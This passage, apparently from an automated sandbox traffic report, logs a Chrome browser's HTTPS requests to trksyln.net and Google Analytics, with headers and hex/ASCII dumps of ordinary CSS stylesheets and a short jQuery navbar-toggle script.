                                                                                                                                                                                                                                                                                                                      Data Ascii: tter-y:0}.g-xl-1,.gx-xl-1{--bs-gutter-x:0.25rem}.g-xl-1,.gy-xl-1{--bs-gutter-y:0.25rem}.g-xl-2,.gx-xl-2{--bs-gutter-x:0.5rem}.g-xl-2,.gy-xl-2{--bs-gutter-y:0.5rem}.g-xl-3,.gx-xl-3{--bs-gutter-x:1rem}.g-xl-3,.gy-xl-3{--bs-gutter-y:1rem}.g-xl-4,.gx-xl-4{--b
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 69 6e 67 3a 31 72 65 6d 20 2e 37 35 72 65 6d 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 6e 6f 74 28 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 73 68 6f 77 6e 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 36 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 36 32 35 72 65 6d 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69
                                                                                                                                                                                                                                                                                                                      Data Ascii: ing:1rem .75rem}.form-floating>.form-control::-moz-placeholder{color:transparent}.form-floating>.form-control::placeholder{color:transparent}.form-floating>.form-control:not(:-moz-placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floati
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 66 64 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 7d 2e 62 74 6e 2d 63 68 65 63 6b 3a 66 6f 63 75 73 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 35 72 65 6d 20 72 67 62 61 28 31 33 2c 31 31 30 2c 32 35 33 2c 2e 35 29 7d 2e 62 74 6e 2d 63 68 65 63 6b 3a 61 63 74 69 76 65 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2c 2e 62 74 6e 2d 63 68 65 63 6b 3a 63 68 65 63 6b 65 64 2b 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: fd}.btn-outline-primary:hover{color:#fff;background-color:#0d6efd;border-color:#0d6efd}.btn-check:focus+.btn-outline-primary,.btn-outline-primary:focus{box-shadow:0 0 0 .25rem rgba(13,110,253,.5)}.btn-check:active+.btn-outline-primary,.btn-check:checked+.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 76 62 61 72 2d 74 6f 67 67 6c 65 72 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 20 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 78 2d 73 68 61 64 6f 77 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 7b 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65
                                                                                                                                                                                                                                                                                                                      Data Ascii: vbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem;transition:box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.navbar-toggler{transition:none
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69
                                                                                                                                                                                                                                                                                                                      Data Ascii: rst-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal>.list-group-item.active{margin-top:0}.list-group-hori
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 30 66 30 66 30 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 73 74 61 72 74 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 7b 72 69 67 68 74 3a 63 61 6c 63 28 2d 2e 35 72 65 6d 20 2d 20 31 70 78 29 3b 77 69 64 74 68 3a 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 72 65 6d 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 73 74 61
                                                                                                                                                                                                                                                                                                                      Data Ascii: er-bottom:1px solid #f0f0f0}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow,.bs-popover-start>.popover-arrow{right:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::before,.bs-popover-sta
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 32 7b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 33 7b 70 61 64 64 69 6e 67 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 34 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 35 7b 70 61 64 64 69 6e 67 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 78 2d 30 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 78 2d 31 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 32 35 72 65 6d 21 69 6d
                                                                                                                                                                                                                                                                                                                      Data Ascii: adding:.25rem!important}.p-2{padding:.5rem!important}.p-3{padding:1rem!important}.p-4{padding:1.5rem!important}.p-5{padding:3rem!important}.px-0{padding-right:0!important;padding-left:0!important}.px-1{padding-right:.25rem!important;padding-left:.25rem!im
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC16384INData Raw: 74 7d 2e 6d 74 2d 6d 64 2d 33 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 30 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 31 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 32 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61
                                                                                                                                                                                                                                                                                                                      Data Ascii: t}.mt-md-3{margin-top:1rem!important}.mt-md-4{margin-top:1.5rem!important}.mt-md-5{margin-top:3rem!important}.mt-md-auto{margin-top:auto!important}.me-md-0{margin-right:0!important}.me-md-1{margin-right:.25rem!important}.me-md-2{margin-right:.5rem!importa
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC8389INData Raw: 78 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 31 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 32 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 33 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 35 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 73 2d 78 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30
                                                                                                                                                                                                                                                                                                                      Data Ascii: xl-0{padding-bottom:0!important}.pb-xl-1{padding-bottom:.25rem!important}.pb-xl-2{padding-bottom:.5rem!important}.pb-xl-3{padding-bottom:1rem!important}.pb-xl-4{padding-bottom:1.5rem!important}.pb-xl-5{padding-bottom:3rem!important}.ps-xl-0{padding-left:0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      5192.168.2.449750160.153.155.1874437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:22 UTC548OUTGET /resources/css/site.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 21 Feb 2024 00:32:23 GMT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      ETag: "8045b96f5d64da1:0"
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:22 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 11097
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC11097INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0d 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 42 61 6c 6f 6f 2b 50 61 61 6a 69 7c 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 22 29 3b 0d 0a 0d 0a 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 2f 2a 20 20 2d 2d 62 6c 75 65 3a 20 23 31 65 35 34 39 66 3b 0d 0a 20 20 2d 2d 69 6e 64 69 67 6f 3a 20 23 36 39 35 61 61 36 3b 0d 0a 20 20 2d 2d 70 75 72 70 6c 65 3a 20 23 36 66 34 32 63 31 3b 0d 0a 20 20 2d 2d 70 69 6e 6b 3a 20 23 65 38 33 65 38 63 3b 0d 0a 20 20 2d 2d 72 65 64 3a 20 23 65 63 31 38 35 64 3b 0d 0a 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: @charset "UTF-8";@import url("https://fonts.googleapis.com/css?family=Baloo+Paaji|Open+Sans:300,300i,400,400i,600,600i,700,700i");:root { /* --blue: #1e549f; --indigo: #695aa6; --purple: #6f42c1; --pink: #e83e8c; --red: #ec185d;


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      6192.168.2.449749160.153.155.1874437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:22 UTC550OUTGET /resources/css/navbar.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC297INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Feb 2024 18:56:05 GMT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      ETag: "809027a2895bda1:0"
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:22 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 6700
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC6700INData Raw: 20 20 2e 68 61 6d 62 75 72 67 65 72 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 66 69 6c 74 65 72 3b 0d 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 20 66 69
                                                                                                                                                                                                                                                                                                                      Data Ascii: .hamburger { display: inline-block; cursor: pointer; -webkit-transition-property: opacity, -webkit-filter; transition-property: opacity, -webkit-filter; transition-property: opacity, filter; transition-property: opacity, fi


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      7192.168.2.449748160.153.155.1874437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:22 UTC534OUTGET /resources/js/navbar.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: trksyln.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/Error
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC307INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 20 Feb 2024 14:57:02 GMT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      ETag: "0b39afd64da1:0"
                                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                      X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:22 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 175
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:23 UTC175INData Raw: 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 24 28 27 23 6e 61 76 2d 74 6f 67 67 6c 65 27 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 69 73 2d 61 63 74 69 76 65 27 29 0d 0a 20 20 20 20 20 20 20 20 24 28 27 75 6c 2e 6e 61 76 27 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 27 73 68 6f 77 27 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: $(document).ready(function () { $('#nav-toggle').click(function () { $(this).toggleClass('is-active') $('ul.nav').toggleClass('show'); });});


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      8192.168.2.449767216.239.34.1814437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC1260OUTPOST /g/collect?v=2&tid=G-JH2MNQ1WXY&gtm=45je4au0v9106823843za200&_p=1730398761454&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&cid=1627253267.1730398763&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=1&sid=1730398763&sct=1&seg=0&dl=https%3A%2F%2Ftrksyln.net%2FError&dr=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&dt=trksyln%20-%20Error&en=page_view&_fv=2&_nsi=1&_ss=2&_c=1&_ee=1&tfd=3241 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: analytics.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:24 UTC1033INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Location: https://www.google-analytics.com/privacy-sandbox/register-conversion?_c=1&cid=1627253267.1730398763&dbk=9479371496876134802&dma=0&en=page_view&gtm=45je4au0v9106823843za200&npa=0&tid=G-JH2MNQ1WXY&dl=https%3A%2F%2Ftrksyln.net%3F
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:24 GMT
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                                                                                                                                                      Server: Golfe2
                                                                                                                                                                                                                                                                                                                      Content-Length: 455
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
